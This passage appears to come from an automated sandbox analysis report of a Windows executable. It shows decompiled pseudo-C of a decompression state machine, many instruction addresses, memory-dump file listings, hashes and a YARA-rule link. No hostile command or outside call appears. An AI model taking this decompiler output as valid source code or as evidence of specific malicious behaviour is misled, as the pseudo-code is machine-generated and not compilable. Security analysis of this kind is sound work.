														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                          0x00406d5a
                                          0x00406d5a
                                          0x00406d5a
                                          0x00406d5a
                                          0x00406d60
                                          0x00406d64
                                          0x00406d68
                                          0x00406d72
                                          0x00406d80
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x00407060
                                          0x0040708d
                                          0x0040708d
                                          0x00407091
                                          0x00000000
                                          0x00000000
                                          0x00407093
                                          0x0040709c
                                          0x004070a2
                                          0x004070a5
                                          0x004070a8
                                          0x004070ab
                                          0x004070ae
                                          0x004070b4
                                          0x004070cd
                                          0x004070d0
                                          0x004070dc
                                          0x004070dd
                                          0x004070e0
                                          0x004070b6
                                          0x004070b6
                                          0x004070c5
                                          0x004070c8
                                          0x004070c8
                                          0x004070ea
                                          0x0040708a
                                          0x0040708a
                                          0x0040708a
                                          0x0040708d
                                          0x00407091
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004070ec
                                          0x004070ec
                                          0x00407065
                                          0x00407069
                                          0x004071a1
                                          0x004071a1
                                          0x004071ab
                                          0x004071b3
                                          0x004071ba
                                          0x004071bc
                                          0x004071c3
                                          0x004071c7
                                          0x004071c7
                                          0x0040706f
                                          0x00407075
                                          0x0040707c
                                          0x00407084
                                          0x00407084
                                          0x00407087
                                          0x00000000
                                          0x00407087
                                          0x004070f1
                                          0x004070fe
                                          0x00407101
                                          0x0040700d
                                          0x0040700d
                                          0x0040700d
                                          0x004067a9
                                          0x004067a9
                                          0x004067a9
                                          0x004067b2
                                          0x00000000
                                          0x00000000
                                          0x004067b8
                                          0x004067b8
                                          0x00000000
                                          0x004067bf
                                          0x004067c3
                                          0x00000000
                                          0x00000000
                                          0x004067c9
                                          0x004067cc
                                          0x004067cf
                                          0x004067d2
                                          0x004067d6
                                          0x00000000
                                          0x00000000
                                          0x004067dc
                                          0x004067dc
                                          0x004067df
                                          0x004067e1
                                          0x004067e2
                                          0x004067e5
                                          0x004067e7
                                          0x004067e8
                                          0x004067ea
                                          0x004067ed
                                          0x004067f2
                                          0x004067f7
                                          0x00406800
                                          0x00406813
                                          0x00406816
                                          0x00406822
                                          0x0040684a
                                          0x0040684c
                                          0x0040685a
                                          0x0040685a
                                          0x0040685e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040684e
                                          0x0040684e
                                          0x00406851
                                          0x00406852
                                          0x00406852
                                          0x00000000
                                          0x0040684e
                                          0x00406824
                                          0x00406828
                                          0x0040682d
                                          0x0040682d
                                          0x00406836
                                          0x0040683e
                                          0x00406841
                                          0x00000000
                                          0x00406847
                                          0x00406847
                                          0x00000000
                                          0x00406847
                                          0x00000000
                                          0x00406864
                                          0x00406864
                                          0x00406868
                                          0x00407114
                                          0x00407114
                                          0x00000000
                                          0x00407114
                                          0x0040686e
                                          0x00406871
                                          0x00406881
                                          0x00406884
                                          0x00406887
                                          0x00406887
                                          0x00406887
                                          0x0040688a
                                          0x0040688e
                                          0x00000000
                                          0x00000000
                                          0x00406890
                                          0x00406890
                                          0x00406896
                                          0x004068c0
                                          0x004068c6
                                          0x004068cd
                                          0x00000000
                                          0x004068cd
                                          0x00406898
                                          0x0040689c
                                          0x0040689f
                                          0x004068a4
                                          0x004068a4
                                          0x004068af
                                          0x004068b7
                                          0x004068ba
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004068ff
                                          0x00406905
                                          0x00406908
                                          0x00406915
                                          0x0040691d
                                          0x00000000
                                          0x00000000
                                          0x004068d4
                                          0x004068d4
                                          0x004068d8
                                          0x00407123
                                          0x00407123
                                          0x00000000
                                          0x00407123
                                          0x004068de
                                          0x004068e4
                                          0x004068ef
                                          0x004068ef
                                          0x004068ef
                                          0x004068f2
                                          0x004068f5
                                          0x004068f8
                                          0x004068fd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406f94
                                          0x00406f94
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406fa6
                                          0x00406fc0
                                          0x00406fc3
                                          0x00406fc9
                                          0x00406fd4
                                          0x00406fd4
                                          0x00406fd6
                                          0x00406fa8
                                          0x00406fa8
                                          0x00406fb7
                                          0x00406fbb
                                          0x00406fbb
                                          0x00406fe0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406fe2
                                          0x00406fe6
                                          0x00407195
                                          0x00407195
                                          0x00000000
                                          0x00407195
                                          0x00406fec
                                          0x00406ff2
                                          0x00406ff9
                                          0x00407001
                                          0x00407004
                                          0x00407007
                                          0x00407007
                                          0x0040700d
                                          0x0040700d
                                          0x00000000
                                          0x00000000
                                          0x00406925
                                          0x00406925
                                          0x00406927
                                          0x0040692a
                                          0x0040699b
                                          0x0040699b
                                          0x0040699e
                                          0x004069a1
                                          0x004069a8
                                          0x004069b2
                                          0x00000000
                                          0x004069b2
                                          0x0040692c
                                          0x0040692c
                                          0x00406930
                                          0x00406933
                                          0x00406935
                                          0x00406938
                                          0x0040693b
                                          0x0040693d
                                          0x00406940
                                          0x00406942
                                          0x00406947
                                          0x0040694a
                                          0x0040694d
                                          0x00406951
                                          0x00406958
                                          0x0040695b
                                          0x00406962
                                          0x00406966
                                          0x0040696e
                                          0x0040696e
                                          0x0040696e
                                          0x00406968
                                          0x00406968
                                          0x00406968
                                          0x0040695d
                                          0x0040695d
                                          0x0040695d
                                          0x00406972
                                          0x00406975
                                          0x00406993
                                          0x00406993
                                          0x00406995
                                          0x00000000
                                          0x00406977
                                          0x00406977
                                          0x00406977
                                          0x0040697a
                                          0x0040697d
                                          0x00406980
                                          0x00406982
                                          0x00406982
                                          0x00406982
                                          0x00406985
                                          0x00406988
                                          0x0040698a
                                          0x0040698b
                                          0x0040698e
                                          0x00000000
                                          0x0040698e
                                          0x00000000
                                          0x00406bc4
                                          0x00406bc4
                                          0x00406bc8
                                          0x00406be6
                                          0x00406be6
                                          0x00406be9
                                          0x00406bf0
                                          0x00406bf3
                                          0x00406bf6
                                          0x00406bf9
                                          0x00406bfc
                                          0x00406bff
                                          0x00406c01
                                          0x00406c08
                                          0x00406c09
                                          0x00406c0b
                                          0x00406c0e
                                          0x00406c11
                                          0x00406c14
                                          0x00406c14
                                          0x00406c19
                                          0x00000000
                                          0x00406c19
                                          0x00406bca
                                          0x00406bca
                                          0x00406bcd
                                          0x00406bd0
                                          0x00406bda
                                          0x00000000
                                          0x00000000
                                          0x00406c2e
                                          0x00406c2e
                                          0x00406c32
                                          0x00406c55
                                          0x00406c58
                                          0x00406c5b
                                          0x00406c65
                                          0x00406c34
                                          0x00406c34
                                          0x00406c37
                                          0x00406c3a
                                          0x00406c3d
                                          0x00406c4a
                                          0x00406c4d
                                          0x00406c4d
                                          0x00000000
                                          0x00000000
                                          0x00406c71
                                          0x00406c71
                                          0x00406c75
                                          0x00000000
                                          0x00000000
                                          0x00406c7b
                                          0x00406c7b
                                          0x00406c7f
                                          0x00000000
                                          0x00000000
                                          0x00406c85
                                          0x00406c85
                                          0x00406c87
                                          0x00406c8b
                                          0x00406c8b
                                          0x00406c8e
                                          0x00406c92
                                          0x00000000
                                          0x00000000
                                          0x00406ce2
                                          0x00406ce2
                                          0x00406ce6
                                          0x00406ced
                                          0x00406ced
                                          0x00406cf0
                                          0x00406cf3
                                          0x00406cfd
                                          0x00000000
                                          0x00406cfd
                                          0x00406ce8
                                          0x00406ce8
                                          0x00000000
                                          0x00000000
                                          0x00406d09
                                          0x00406d09
                                          0x00406d0d
                                          0x00406d14
                                          0x00406d17
                                          0x00406d1a
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d1d
                                          0x00406d20
                                          0x00406d23
                                          0x00406d23
                                          0x00406d26
                                          0x00406d29
                                          0x00406d2c
                                          0x00406d2c
                                          0x00406d2f
                                          0x00406d36
                                          0x00406d3b
                                          0x00000000
                                          0x00000000
                                          0x00406dc9
                                          0x00406dc9
                                          0x00406dcd
                                          0x0040716b
                                          0x0040716b
                                          0x00000000
                                          0x0040716b
                                          0x00406dd3
                                          0x00406dd3
                                          0x00406dd6
                                          0x00406dd9
                                          0x00406ddd
                                          0x00406de0
                                          0x00406de6
                                          0x00406de8
                                          0x00406de8
                                          0x00406de8
                                          0x00406deb
                                          0x00406dee
                                          0x00000000
                                          0x00000000
                                          0x004069be
                                          0x004069be
                                          0x004069c2
                                          0x0040712f
                                          0x0040712f
                                          0x00000000
                                          0x0040712f
                                          0x004069c8
                                          0x004069c8
                                          0x004069cb
                                          0x004069ce
                                          0x004069d2
                                          0x004069d5
                                          0x004069db
                                          0x004069dd
                                          0x004069dd
                                          0x004069dd
                                          0x004069e0
                                          0x004069e3
                                          0x004069e3
                                          0x004069e6
                                          0x004069e9
                                          0x00000000
                                          0x00000000
                                          0x004069ef
                                          0x004069ef
                                          0x004069f5
                                          0x00000000
                                          0x00000000
                                          0x004069fb
                                          0x004069fb
                                          0x004069ff
                                          0x00406a02
                                          0x00406a05
                                          0x00406a08
                                          0x00406a0b
                                          0x00406a0c
                                          0x00406a0f
                                          0x00406a11
                                          0x00406a17
                                          0x00406a1a
                                          0x00406a1d
                                          0x00406a20
                                          0x00406a23
                                          0x00406a26
                                          0x00406a29
                                          0x00406a45
                                          0x00406a48
                                          0x00406a4b
                                          0x00406a4e
                                          0x00406a55
                                          0x00406a59
                                          0x00406a5b
                                          0x00406a5f
                                          0x00406a2b
                                          0x00406a2b
                                          0x00406a2f
                                          0x00406a37
                                          0x00406a3c
                                          0x00406a3e
                                          0x00406a40
                                          0x00406a40
                                          0x00406a62
                                          0x00406a69
                                          0x00406a6c
                                          0x00000000
                                          0x00406a72
                                          0x00406a72
                                          0x00000000
                                          0x00406a72
                                          0x00000000
                                          0x00406a77
                                          0x00406a77
                                          0x00406a7b
                                          0x0040713b
                                          0x0040713b
                                          0x00000000
                                          0x0040713b
                                          0x00406a81
                                          0x00406a81
                                          0x00406a84
                                          0x00406a87
                                          0x00406a8b
                                          0x00406a8e
                                          0x00406a94
                                          0x00406a96
                                          0x00406a96
                                          0x00406a96
                                          0x00406a99
                                          0x00406a9c
                                          0x00406a9c
                                          0x00406a9c
                                          0x00406aa2
                                          0x00000000
                                          0x00000000
                                          0x00406aa4
                                          0x00406aa4
                                          0x00406aa7
                                          0x00406aaa
                                          0x00406aad
                                          0x00406ab0
                                          0x00406ab3
                                          0x00406ab6
                                          0x00406ab9
                                          0x00406abc
                                          0x00406abf
                                          0x00406ac2
                                          0x00406ada
                                          0x00406add
                                          0x00406ae0
                                          0x00406ae3
                                          0x00406ae3
                                          0x00406ae6
                                          0x00406aea
                                          0x00406aec
                                          0x00406ac4
                                          0x00406ac4
                                          0x00406acc
                                          0x00406ad1
                                          0x00406ad3
                                          0x00406ad5
                                          0x00406ad5
                                          0x00406aef
                                          0x00406af6
                                          0x00406af9
                                          0x00000000
                                          0x00406afb
                                          0x00406afb
                                          0x00000000
                                          0x00406afb
                                          0x00406af9
                                          0x00406b00
                                          0x00406b00
                                          0x00406b00
                                          0x00406b00
                                          0x00000000
                                          0x00000000
                                          0x00406b3b
                                          0x00406b3b
                                          0x00406b3f
                                          0x00407147
                                          0x00407147
                                          0x00000000
                                          0x00407147
                                          0x00406b45
                                          0x00406b45
                                          0x00406b48
                                          0x00406b4b
                                          0x00406b4f
                                          0x00406b52
                                          0x00406b58
                                          0x00406b5a
                                          0x00406b5a
                                          0x00406b5a
                                          0x00406b5d
                                          0x00406b60
                                          0x00406b60
                                          0x00406b66
                                          0x00406b04
                                          0x00406b04
                                          0x00406b07
                                          0x00000000
                                          0x00406b07
                                          0x00406b68
                                          0x00406b68
                                          0x00406b6b
                                          0x00406b6e
                                          0x00406b71
                                          0x00406b74
                                          0x00406b77
                                          0x00406b7a
                                          0x00406b7d
                                          0x00406b80
                                          0x00406b83
                                          0x00406b86
                                          0x00406b9e
                                          0x00406ba1
                                          0x00406ba4
                                          0x00406ba7
                                          0x00406ba7
                                          0x00406baa
                                          0x00406bae
                                          0x00406bb0
                                          0x00406b88
                                          0x00406b88
                                          0x00406b90
                                          0x00406b95
                                          0x00406b97
                                          0x00406b99
                                          0x00406b99
                                          0x00406bb3
                                          0x00406bba
                                          0x00406bbd
                                          0x00000000
                                          0x00406bbf
                                          0x00406bbf
                                          0x00000000
                                          0x00406bbf
                                          0x00000000
                                          0x00406e4c
                                          0x00406e4c
                                          0x00406e50
                                          0x00407177
                                          0x00407177
                                          0x00000000
                                          0x00407177
                                          0x00406e56
                                          0x00406e56
                                          0x00406e59
                                          0x00406e5c
                                          0x00406e60
                                          0x00406e63
                                          0x00406e69
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6e
                                          0x00000000
                                          0x00000000
                                          0x00406c1c
                                          0x00406c1c
                                          0x00406c1f
                                          0x00000000
                                          0x00000000
                                          0x00406f5b
                                          0x00406f5b
                                          0x00406f5f
                                          0x00406f81
                                          0x00406f81
                                          0x00406f84
                                          0x00406f8e
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00406f91
                                          0x00406f61
                                          0x00406f61
                                          0x00406f64
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6b
                                          0x00406f6e
                                          0x00000000
                                          0x00000000
                                          0x00407018
                                          0x00407018
                                          0x0040701c
                                          0x0040703a
                                          0x0040703a
                                          0x0040703a
                                          0x0040703a
                                          0x00407041
                                          0x00407048
                                          0x0040704f
                                          0x0040704f
                                          0x00407056
                                          0x00407059
                                          0x00407060
                                          0x00000000
                                          0x00407063
                                          0x0040701e
                                          0x0040701e
                                          0x00407021
                                          0x00407024
                                          0x00407027
                                          0x0040702e
                                          0x00406f72
                                          0x00406f72
                                          0x00406f75
                                          0x00000000
                                          0x00000000
                                          0x00407109
                                          0x00407109
                                          0x0040710c
                                          0x0040700d
                                          0x0040700d
                                          0x0040700d
                                          0x00000000
                                          0x00407013
                                          0x00000000
                                          0x00406d43
                                          0x00406d43
                                          0x00406d45
                                          0x00406d4c
                                          0x00406d4d
                                          0x00406d4f
                                          0x00406d52
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x00407060
                                          0x00000000
                                          0x00407063
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406d88
                                          0x00406d88
                                          0x00406d8b
                                          0x00406dc1
                                          0x00406dc1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef4
                                          0x00406ef4
                                          0x00406ef7
                                          0x00406ef9
                                          0x00407183
                                          0x00407183
                                          0x00000000
                                          0x00407183
                                          0x00406eff
                                          0x00406eff
                                          0x00406f02
                                          0x00000000
                                          0x00000000
                                          0x00406f08
                                          0x00406f08
                                          0x00406f0c
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f0f
                                          0x00000000
                                          0x00406f0f
                                          0x00406d8d
                                          0x00406d8d
                                          0x00406d8f
                                          0x00406d91
                                          0x00406d93
                                          0x00406d96
                                          0x00406d97
                                          0x00406d99
                                          0x00406d9b
                                          0x00406d9e
                                          0x00406da1
                                          0x00406db7
                                          0x00406db7
                                          0x00406dbc
                                          0x00406df4
                                          0x00406df4
                                          0x00406df8
                                          0x00406e21
                                          0x00406e24
                                          0x00406e26
                                          0x00406e2d
                                          0x00406e30
                                          0x00406e33
                                          0x00406e33
                                          0x00406e38
                                          0x00406e38
                                          0x00406e3a
                                          0x00406e3d
                                          0x00406e44
                                          0x00406e47
                                          0x00406e74
                                          0x00406e74
                                          0x00406e77
                                          0x00406e7a
                                          0x00406eee
                                          0x00406eee
                                          0x00406eee
                                          0x00406eee
                                          0x00000000
                                          0x00406eee
                                          0x00406e7c
                                          0x00406e7c
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8b
                                          0x00406e8e
                                          0x00406e91
                                          0x00406e94
                                          0x00406e97
                                          0x00406e9a
                                          0x00406e9d
                                          0x00406eb6
                                          0x00406eb8
                                          0x00406ebb
                                          0x00406ebc
                                          0x00406ebf
                                          0x00406ec1
                                          0x00406ec4
                                          0x00406ec6
                                          0x00406ec8
                                          0x00406ecb
                                          0x00406ecd
                                          0x00406ed0
                                          0x00406ed4
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406ed7
                                          0x00406eda
                                          0x00406edd
                                          0x00406e9f
                                          0x00406e9f
                                          0x00406ea7
                                          0x00406eac
                                          0x00406eae
                                          0x00406eb1
                                          0x00406eb1
                                          0x00406ee0
                                          0x00406ee7
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00000000
                                          0x00406ee9
                                          0x00406ee9
                                          0x00000000
                                          0x00406ee9
                                          0x00406ee7
                                          0x00406dfa
                                          0x00406dfa
                                          0x00406dfd
                                          0x00406dff
                                          0x00406e02
                                          0x00406e05
                                          0x00406e08
                                          0x00406e0a
                                          0x00406e0d
                                          0x00406e10
                                          0x00406e10
                                          0x00406e13
                                          0x00406e13
                                          0x00406e16
                                          0x00406e1d
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00000000
                                          0x00406e1f
                                          0x00406e1f
                                          0x00000000
                                          0x00406e1f
                                          0x00406e1d
                                          0x00406da3
                                          0x00406da3
                                          0x00406da6
                                          0x00406da8
                                          0x00406dab
                                          0x00000000
                                          0x00000000
                                          0x00406b0a
                                          0x00406b0a
                                          0x00406b0e
                                          0x00407153
                                          0x00407153
                                          0x00000000
                                          0x00407153
                                          0x00406b14
                                          0x00406b14
                                          0x00406b17
                                          0x00406b1a
                                          0x00406b1d
                                          0x00406b20
                                          0x00406b23
                                          0x00406b26
                                          0x00406b28
                                          0x00406b2b
                                          0x00406b2e
                                          0x00406b31
                                          0x00406b33
                                          0x00406b33
                                          0x00406b33
                                          0x00000000
                                          0x00000000
                                          0x00406c95
                                          0x00406c95
                                          0x00406c99
                                          0x0040715f
                                          0x0040715f
                                          0x00000000
                                          0x0040715f
                                          0x00406c9f
                                          0x00406c9f
                                          0x00406ca2
                                          0x00406ca5
                                          0x00406ca8
                                          0x00406caa
                                          0x00406caa
                                          0x00406caa
                                          0x00406cad
                                          0x00406cb0
                                          0x00406cb3
                                          0x00406cb6
                                          0x00406cb9
                                          0x00406cbc
                                          0x00406cbd
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cc2
                                          0x00406cc5
                                          0x00406cc8
                                          0x00406ccb
                                          0x00406ccb
                                          0x00406ccb
                                          0x00406cce
                                          0x00406cd0
                                          0x00406cd0
                                          0x00000000
                                          0x00000000
                                          0x00406f12
                                          0x00406f12
                                          0x00406f12
                                          0x00406f16
                                          0x00000000
                                          0x00000000
                                          0x00406f1c
                                          0x00406f1c
                                          0x00406f1f
                                          0x00406f22
                                          0x00406f25
                                          0x00406f27
                                          0x00406f27
                                          0x00406f27
                                          0x00406f2a
                                          0x00406f2d
                                          0x00406f30
                                          0x00406f33
                                          0x00406f36
                                          0x00406f39
                                          0x00406f3a
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3f
                                          0x00406f42
                                          0x00406f45
                                          0x00406f48
                                          0x00406f4b
                                          0x00406f4f
                                          0x00406f51
                                          0x00406f54
                                          0x00000000
                                          0x00406f56
                                          0x00406f56
                                          0x00406cd3
                                          0x00406cd3
                                          0x00000000
                                          0x00406cd3
                                          0x00406f54
                                          0x00407189
                                          0x00407189
                                          0x00000000
                                          0x00000000
                                          0x004067b8
                                          0x004071c0
                                          0x004071c0
                                          0x00000000
                                          0x004071c0
                                          0x0040700d
                                          0x0040708d
                                          0x00407056

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
                                          • Instruction ID: 56db4e79aaf5e8580c905796a14d264bc3fb4972df64c765fca97ee639103a5c
                                          • Opcode Fuzzy Hash: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
                                          • Instruction Fuzzy Hash: 87A15531E04229CBDF28CFA8C8446ADBBB1FF44305F14812ED856BB281C7786A86DF45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406F5B, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E00406F5B() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
